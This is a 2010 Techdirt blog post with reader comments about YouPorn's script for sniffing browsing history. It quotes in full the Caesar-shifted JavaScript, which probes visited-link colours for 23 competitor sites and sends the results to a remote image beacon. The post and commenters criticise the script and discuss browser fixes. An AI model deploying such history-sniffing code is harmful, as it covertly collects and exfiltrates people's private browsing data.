'Actor' Allegedly Threatening Carnival Cruise... >>
<< Wi-Lan Just Keeps On Suing; Says Cable Modems...
 tdicon 


(Mis)Uses of Technology

by Mike Masnick

Wed, Dec 1st 2010 3:47am




Filed Under:
browsers, encryption, history, javascript, spying

Companies:
youporn


How YouPorn Tries To Hide That It's Spying On Your Browsing History

from the what,-no-rot-13? dept

There's a fair bit of attention being paid to a Forbes article about some new research concerning how a bunch of websites, including YouPorn, are exploiting a simple security hole to see what other sites you've visited:

How does it work? It's based on your browser changing the color of links you've already clicked on. A script on the site exploits a Web privacy leak to quickly check and see whether your browser reveals that the links to a host of other porn sites have been assigned the color "purple," meaning you've clicked them before.
This isn't a huge surprise, but what I found most fascinating was how YouPorn sought to hide this bit of javascript by "encrypting" it. And by "encrypting" it, I mean switching letters one letter up in the alphabet. As Kashmir Hill explains:
The script on YouPorn’s site that checks a user’s history (which you can see for yourself by going to the site and checking out its html with “View Source”) looks like this:

<script type="text/javascript">
function ypol(){var k={0:"qpsoivc/dpn",1:"sfeuvcf/dpn",
2:"bevmugsjfoegjoefs/dpn",3:"ywjefpt/dpn",4:"uvcf9/dpn",
5:"yoyy/dpn",6:"nfhbqpso/dpn",7:"nfhbspujd/dpn",
8:"yibntufs/dpn",9:"bxfnqjsf/dpn",10:"sfbmjuzljoht/dpn",
11:"csb{{fst/dpn",12:"yuvcf/dpn",13:"cbohcspt2/dpn",
14:"gmjoh/dpn",15:"gsffpoft/dpn",16:"nzgsffqbztjuf/dpn",
17:"efcpobjscmph/dpn",18:"qbztfswf/dpn",19:"nbyqpso/dpn",
20:"wjefpt{/dpn",21:"bfco/ofu",22:"qpsopsbnb/dpn"};
var g=[];for(var m in k){var d=k[m];
var a="";for(var f=0;f<d.length;f++)
{a+=String.fromCharCode(d.charCodeAt(f)-1)}var h=false;
for(var j in {"http://":"","http://www.":""})
{var l=document.createElement("a");
l.href=j+a;document.getElementById("ol").appendChild(l);
var e="";if(navigator.appName.indexOf("Microsoft")!=-1){e=l.currentStyle.color}
else{e=document.defaultView.getComputedStyle(l,null).getPropertyValue("color")}
if(e=="rgb(12, 34, 56)"||e=="rgb(12,34,56)"){h=true}}if(h){g.push(m)}}
var b=(g instanceof Array)?g.join(","):"";var c=document.createElement("img");
c.src="http://ol.youporn.com/blank.gif?id="+b;document.getElementById("ol").appendChild(c)}ypol();
</script>

That list of gibberish contains the sites that YouPorn is checking to see if you’ve visited, but disguises them with a bit o’ simple cryptography. Dial back each letter by one, so “qpsoivc/dpn”, for example, becomes “pornhub.com.”

What's amazing is that anyone actually thought this was a worthwhile move. It's not that hard to "decrypt" and it's almost obvious to the naked eye because it's not too difficult to figure out how the "encryption" (and I use that word loosely) works just by noticing all the terms that end in /dpn. You'd think even a rot-13 would throw a few more people off the scent.

40 Comments | Leave a Comment..


If you liked this post, you may also be interested in...
 


 

Reader Comments (rss)

(Flattened / Threaded)

  1.  

    TANSTAAFL

    icon
    Rose M. Welch (profile), Dec 1st, 2010 @ 2:51am

    Anyone who visits a free porn site knows that there's some kind of tracking going on, but the other sites don't have that whole 'Hey, I'm a porn site.' excuse. :P

    reply to this | link to this | view in thread ]

  2.  

    #corrections

    icon
    paperbag (profile), Dec 1st, 2010 @ 4:03am

    Last word: sent
    should be: scent

    Have a good day, and I wish I could check this out for myself at work. ;)

    reply to this | link to this | view in thread ]

  3.  

    Silly techdirt

    identicon
    John, Dec 1st, 2010 @ 4:22am

    I doubt it's to hide it from a human, but a robot. This is youporn's way of making those URLs not give some kind of credit back to the competition. Seems like it would be quite effective at that.

    reply to this | link to this | view in thread ]

  4.  
    identicon
    Anonymous Coward, Dec 1st, 2010 @ 4:27am

    This exploit is old news, see for instance http://wtikay.com/ (which also has a page listing several ways to protect yourself).

    This is fixed in Firefox 4, see http://dbaron.org/mozilla/visited-privacy and https://developer.mozilla.org/en/CSS/Privacy_and_the_:visited_selector for the details. The relevant bug is https://bugzilla.mozilla.org/show_bug.cgi?id=147777.

    If you are still using Firefox 3, the Link Status extension (https://addons.mozilla.org/pt-BR/firefox/addon/12312/) has a checkbox to disable the visited link color, and it shows a star on the status bar if the link is visited (so you do not lose the ability to know if you have already visited that link).

    reply to this | link to this | view in thread ]

  5.  
    identicon
    abc gum, Dec 1st, 2010 @ 4:28am

    ROT 1 - that's too funny !

    reply to this | link to this | view in thread ]

  6.  
    identicon
    Anonymous Coward, Dec 1st, 2010 @ 4:36am

    I call that javascript obfuscation and if you do a search for it you will find people do competition on that stuff.

    Personally I think it is dumb because it can be "decrypted" or deobfuscated by just running the script with a few modifications.

    reply to this | link to this | view in thread ]

  7.  

    Re:

    identicon
    abc gum, Dec 1st, 2010 @ 4:48am

    ROT 1 is obfuscation ?
    I think not, although it might be considered blurring.

    reply to this | link to this | view in thread ]

  8.  

    Its to get past nanny and keyword checkers on scripts.

    identicon
    darryl, Dec 1st, 2010 @ 4:49am

    they are not encrypting to hide it from users, but I bet it is an easy way to get past firewalls, kiddy protection software and so on..

    It takes away all the nasty keywords that are used by that type of protection software.

    reply to this | link to this | view in thread ]

  9.  
    identicon
    Anonymous Coward, Dec 1st, 2010 @ 5:14am

    Another reason that they might be obfuscating it is to avoid trademark violations.

    reply to this | link to this | view in thread ]

  10.  

    Re: Its to get past nanny and keyword checkers on scripts.

    icon
    Chronno S. Trigger (profile), Dec 1st, 2010 @ 5:17am

    You porn is still vary clearly you porn. That's still not getting past the filters. They'd have to encrypt the entire page, then who would want to go there?

    reply to this | link to this | view in thread ]

  11.  

    Re:

    identicon
    DS, Dec 1st, 2010 @ 5:38am

    Looks like Opera 10 is immune.. or I'm just lucky.. It can't find a darn thing about my history.

    reply to this | link to this | view in thread ]

  12.  
    identicon
    Anonymous Coward, Dec 1st, 2010 @ 5:44am

    scent

    reply to this | link to this | view in thread ]

  13.  

    would this classify as DMCA...

    icon
    TechnoMage (profile), Dec 1st, 2010 @ 6:04am

    Circumvention? ;) {The act of "decrypting" this, that is.

    reply to this | link to this | view in thread ]

  14.  

    Re: Re:

    identicon
    Anonymous Coward, Dec 1st, 2010 @ 6:19am

    I doubt it, once you let the flash app run it can collect way more than javascript could ever do.

    reply to this | link to this | view in thread ]

  15.  

    Re:

    identicon
    Anonymous Coward, Dec 1st, 2010 @ 6:50am

    I believe NoScript adds Fx4-style "plug the hole without removing the link color changing feature" protections. I know for certain it implements the HTTP Strict Transport Security and X-Frame-Options security features. (In fact, I think it was the second implementation for both of them after the people who proposed them)

    NoScript isn't just JS whitelisting, after all. When you set "Scripts Globally Allowed (dangerous)", you still get the XSS-filter, clickjacking protection, ABE (protection against router exploits bounced off your browser), etc.

    reply to this | link to this | view in thread ]

  16.  

    Re: Silly techdirt

    identicon
    Jon B., Dec 1st, 2010 @ 6:54am

    Yes, this is the reason for the obfuscation.

    And, meh, this is a common little trick that browsers are already "fixing" pretty quickly.

    reply to this | link to this | view in thread ]

  17.  

    Awesome

    identicon
    Freedie B, Babe, Dec 1st, 2010 @ 7:32am

    I didn't know about half of these sites. Thanks, Youporn!

    reply to this | link to this | view in thread ]

  18.  

    Old news, but it's still a good refresher.

    icon
    Miles (profile), Dec 1st, 2010 @ 7:32am

    Ironically, I was working with another "webmaster" trying to correct a cookie issue when he requested of me to ensure my "Remember me" option was checked.

    I told him, straight up: "No. It is not my responsibility to leave open a potential security risk for the sake of convenience for either of us. Fix your [removed] cookie problem."

    I find it quite interesting people refuse to take responsibility for their actions when things like this appear.

    What, is it really difficult to remember one username and several passwords at various sites? Clean out the browser history upon close? Stop using idiotic add-ons to store sensitive information, such as CC numbers?

    When people, using these features, then turn and complain about compromises, I can only think "relish in your own stupidity" because they want short cuts, not responsible actions.

    Then again, now that there's an ever-increasing demand for "password strength" patterns so convoluted they require people to write them down just so they can remember them, I can't really blame them for using software to remember it for them.

    Hence why "webmaster" is now in quotes. Most aren't masters at all, but idiots.

    See you around the next "vulnerability" to laziness.
    >:)

    reply to this | link to this | view in thread ]

  19.  
    icon
    muzik027 (profile), Dec 1st, 2010 @ 7:35am

    Wouldn't an Anonymizer take care of that? Chrome has a good one.

    reply to this | link to this | view in thread ]

  20.  

    Re:

    icon
    Marcus Carab (profile), Dec 1st, 2010 @ 7:39am

    Is it just colour, though? Or does it disable the :visited style selector entirely? Because I've seen this exploit done by changing the height of visited links then checking the y-offset

    reply to this | link to this | view in thread ]

  21.  

    Re: Re:

    identicon
    Anonymous Coward, Dec 1st, 2010 @ 7:47am

    NoScript is not enough, see the first link I posted (it has an alternative mode which works even with NoScript).

    reply to this | link to this | view in thread ]

  22.  

    Re: Re:

    identicon
    Anonymous Coward, Dec 1st, 2010 @ 7:49am

    Link Status sets an option on Firefox 3.5+ which disables the :visited style entirely. Firefox 4 only allows a few things on the :visited style (mostly only color changes), and for these it lies to the page pretending the :visited style was never applied.

    reply to this | link to this | view in thread ]

  23.  

    oh oh

    identicon
    dev, Dec 1st, 2010 @ 8:05am

    here comes a DMCA lawsuit for decrypting that.

    reply to this | link to this | view in thread ]

  24.  
    identicon
    Anonymous Coward, Dec 1st, 2010 @ 8:31am

    ...incognito browsing on chrome...what?

    reply to this | link to this | view in thread ]

  25.  

    Re:

    identicon
    Anonymous Coward, Dec 1st, 2010 @ 8:59am

    Absolutely. Chrome allows you to open an Anonymizer browse window

    reply to this | link to this | view in thread ]

  26.  

    meh

    identicon
    TheStupidOne, Dec 1st, 2010 @ 9:13am

    I can't honestly say I'm all that worried. I can't see any nefarious purposes this information could be used for (I'm sure there is something, but I just don't see it). While it may be slightly disconcerting that a porn site is tracking my porn browsing history it doesn't bother me, especially since tracking usually allows a site or service to provide personalized ads or recommendations ... How much better would a free porn site be if it immediately knew the 10 best videos to show me?

    reply to this | link to this | view in thread ]

  27.  

    HAHA!

    identicon
    James, Dec 1st, 2010 @ 10:06am

    This is why privacy mode and ad blockers were created.

    reply to this | link to this | view in thread ]

  28.  

    There are a number of

    icon
    Joe Magly (profile), Dec 1st, 2010 @ 10:49am

    Jscript obfuscation tools out there that do a much better job than this.

    This was just lazy/inexperienced work.

    reply to this | link to this | view in thread ]

  29.  

    Re: Re: Re:

    identicon
    ds, Dec 1st, 2010 @ 12:29pm

    I did, and it found nothing.. odd.

    reply to this | link to this | view in thread ]

  30.  
    identicon
    Dean Landolt, Dec 1st, 2010 @ 1:00pm

    rot-13? that's not nearly nefarious enough!

    they should have used Billy Hoffman's javascript dehydration technique (http://blip.tv/file/3684946 ~ 50 min mark) -- it hides your javascript in whitespace (tabs and spaces being 1s and 0s) -- brilliant and pure evil

    reply to this | link to this | view in thread ]

  31.  

    Re: HAHA!

    identicon
    Anonymous Coward, Dec 1st, 2010 @ 1:46pm

    No privacy mode or blocker will stop you from yourself.

    If you get to those sites and enable them to watch whatever you want to watch you are disabling the protection those things had to offer.

    Flash can access the OS directly and put files in your PC what privacy or security is that?

    Same goes to JAVA(not to be confused with Javascript they are different).

    Given that porn websites are hostile and many of them will get hacked and carry malicious payloads people should be careful enabling anything in there.

    reply to this | link to this | view in thread ]

  32.  
    identicon
    Anonymous, Dec 1st, 2010 @ 2:17pm

    Use a dedicated browser for viewing...questionable sites, in private browsing mode. Safari, at least, completely turns off the history and doesn't color the links.

    reply to this | link to this | view in thread ]

  33.  

    Re:

    icon
    nasch (profile), Dec 1st, 2010 @ 3:49pm

    As does IE. FF for some reason only lets you switch the whole app to private mode, as far as I know anyway. Chrome/Chromium and IE both allow simultaneous private and normal browsing in different tabs or windows.

    reply to this | link to this | view in thread ]

  34.  

    Re:

    identicon
    abc gum, Dec 1st, 2010 @ 6:05pm

    For those who want to be really secure, use double ROT 13.

    reply to this | link to this | view in thread ]

  35.  

    Re: Re:

    identicon
    Anonymous Coward, Dec 2nd, 2010 @ 4:25am

    Double Rainbow allusion?

    reply to this | link to this | view in thread ]

  36.  

    Nothing new

    identicon
    caibbor, Dec 2nd, 2010 @ 7:30am

    it's called code obfuscation, as another poster put it, and it's not a very good implementation at that. "shifting one letter in the alphabet" is what we call bit shifting, more or less.

    reply to this | link to this | view in thread ]

  37.  

    Re: Nothing new

    identicon
    caibbor, Dec 2nd, 2010 @ 7:31am

    erm, ASCII shift.

    reply to this | link to this | view in thread ]

  38.  

    Re: Silly techdirt

    identicon
    Anonymous Coward, Dec 3rd, 2010 @ 4:20pm

    Just use "ref:nofollow" in the anchor tag.

    reply to this | link to this | view in thread ]

  39.  
    identicon
    SUSAN, Mar 20th, 2011 @ 5:33am

    IDEVELOP FORGETPREVIEW

    reply to this | link to this | view in thread ]

  40.  

    Ignore them.

    identicon
    Brigand, Apr 25th, 2011 @ 2:31am

    Just use the 'private browsing' option in the Tools menu — and for the love of simplicity, pay no mind to the pretentious folk who relish in churning out jargon-filled guff and making spaghetti out of very straightforward issues.

    Fin.

    reply to this | link to this | view in thread ]


Add Your Comment

Have a Techdirt Account? Sign in now. Want one? Register here
Get Techdirt’s Daily Email
Save me a cookie
  • Note: A CRLF will be replaced by a break tag (<br>), all other allowable HTML will remain intact
  • Allowed HTML Tags: <b> <i> <a> <em> <br> <strong> <blockquote> <hr> <tt>

'Actor' Allegedly Threatening Carnival Cruise... >>
<< Wi-Lan Just Keeps On Suing; Says Cable Modems...
 tdicon 

A word from our Sponsors...
Follow Techdirt
Flattr rss rss
Essential Reading

Hot Topics

New To Techdirt?

Explore some core concepts:

read all »

A word from our Sponsors...

Close

Email This